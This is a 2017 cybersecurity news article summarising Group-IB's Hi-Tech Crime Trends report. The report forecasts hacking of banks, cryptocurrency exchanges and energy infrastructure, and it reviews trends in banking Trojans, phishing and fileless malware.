Pierluigi Paganini October 12, 2017

Hi-Tech Crime Trends 2017 – Banks, powerstations and cryptocyrrency exchanges are forecast to be the most likely targets for hacking in the near future

Group-IB, one of the global leaders in preventing and investigating high-tech crimes and online fraud, presented its Hi-Tech Crime Trends 2017  report at CyberCrimeCon,

In the next year, the main source of losses for banks from cyber-attacks will not be theft of money, but destruction of their IT infrastructure during the final stages of a targeted attack. Banks used to be attacked by cybercriminals. Today, state-backed hackers are also doing this much more frequently. By destroying IT infrastructure cybercriminals will attempt to cover their tracks during thefts, while the aim of state-sponsored hackers will be to maximize the damage to banks and discontinue banking operations. In both cases, the damage done to banks may be even greater than the amount of funds stolen due to service interruptions and the resulting reputational and regulatory impact.

• One of the possible sabotage scenarios may be trading on exchanges on behalf of the victim bank in order to influence exchange rates and cause losses. This can lead to snowballing style flash crashes as HFT trading algorithms respond to fluctuations in exchange rates.
• Out of 22 new malicious programs used to steal funds, 20 (91%) were created and are controlled by Russian-speaking hackers.
• Phishing for banks and payment systems is automated and conducted in real time, which allows cybercriminals to bypass SMS confirmations for debiting money. On average, 10-15% of visitors of financial phishing websites enter their data.

Hackers are increasing their focus on the crypto industry (ICO, wallets, exchanges, funds), which have been accumulating increasingly large capitalisations and funds. In technical terms, the attacks against service providers in this sector are no more difficult than against banks, however the information security in place and maturity of blockchain companies is significantly lower. A further motivation for criminal attackers is that blockchain technologies are more anonymous and unregulated – this considerably reduces the risk of being caught during money withdrawal.

• The total damage caused by targeted hacker attacks on the crypto-currency industry amounts to more than $168 million, and the income from attacks on cryptocurrency exchanges varies from $1.5 million (Bitcurex) to $72 million (Bitfinex). While a successful attack on a bank brings criminals only about $1.5 million on average.
• Attacks on cryptocurrency exchanges are conducted in the same way as targeted attacks on banks with similar or sometimes identical tools and tactics. E.g. cybercriminals use fake ID to get victim’s SIM-card to recover passwords and gain control over accounts in cryptocurrency services.
• The fact attackers are “retargeting” popular banking Trojans such as TrickBot, Vawtrak, Qadars, Tinba, Marcher to collect logins and passwords of cryptocurrency users suggests that they have found a new niche and might focus outside of the traditional banking sector in the nearest future.
• Targeted attacks on cryptocurrency exchanges will be carried out not only by financially motivated hackers but by state-sponsored attackers as well.

Hackers will now successfully attack more industrial facilities as they have learnt how to work with the “logic” of critical infrastructure. These facilities use complex and unique IT systems: even if one gains access to them, specific knowledge about the principles of their operation is needed to conduct attacks. Over the past year, we have observed that hackers’ competence has increased along with their capacities to impact critical infrastructure. Therefore, we now forecast new large-scale incidents targeting industrials and related core infrastructure.

BlackEnergy group continues to attack financial and energy companies. The group uses new tools that allow Remote terminal units (RTUs) responsible for the physical opening/closing of power grids to be remotely controlled. Test attacks on power generating companies in the UK and Ireland were tracked in the summer of 2017.

HI-TECH CRIME MARKET ASSESSMENT

The growth in the number of attacks and the totals stolen is a significant indicator of hackers’ capabilities, which drive changes in their tactics and targets. The majority of attackers follow the money, and if they find more efficient and safer ways to earn it, they start investing in them, creating new tools, services, and attack schemes.

In Russia, the amount of losses caused by theft from legal entities is still in decline, but the loss caused by Android banking Trojans is still on the increase. The number of targeted attacks on banks and payment systems is on the rise, but hackers have earned the majority of their profits outside Russia, as we predicted last year.

After phishing attacks on bank clients and payment systems were fully automated, the amount of loss from their activity in Russia became very significant. Every day they attack many more users than banking Trojans, but the net amount of loss is still smaller. However, due to the simplicity of this scheme, an increasing number of criminals are starting to use it.

Development of Hacking Tools

• Fileless malware using malicious scripts to launch an attack is a new and currently the primary attack method. To slip under the radar, hackers use fileless software that exists only in RAM until the system is rebooted. That said, malicious PowerShell, VBS, PHP scripts help them to ensure persistence in the system and automate some stages of their attacks.
• NotPetya has demonstrated that creating a template can be enough to gain control over a corporate network. In the future, we should expect many scripted cyber-attacks as well as ready-made simple tools that can gain control over corporate domains automatically. If such tools are made publicly available or are sold among hackers, this can lead to an avalanche in growth of attacks on the corporate sector. We primarily expect more incidents involving ransomware, theft of confidential information and extortion for non-disclosure, money theft, and incidents of public exposure by non-financially motivated hackers.
• We expect malware developers to be more active in continuing to publish codes of their programs online. In addition, leaks published by The Shadow Brokers and similar organisations will also be immediately used for malware creation and improvement. This will give a powerful boost to the development of the cybercrime industry.

The full version of Hi-Tech Crime Trends 2017 is available on the Group-IB website

https://www.group-ib.com.

About Group-IB

Group-IB is one of the global leaders in preventing and investigating high-tech crimes and online fraud and the first Russian supplier of threat intelligence solutions included in Gartner, Forrester, and IDC reports. In order to prevent cyberattacks, Group-IB supplies solutions from its line of early threat detection products. It is a permanent member of the World Economic Forum. Group-IB has the largest criminalistics laboratory in Eastern Europe and a computer emergency response team (CERT-GIB). In 2017, the company became the leader of Russia Threat Intelligence Security Services Market Analysis conducted by IDC. For more details visit:http://www.group-ib.com

Pierluigi Paganini

(Security Affairs – cybercrime, Crime Trends 2017 report)

[adrotate banner=”5″]

[adrotate banner=”13″]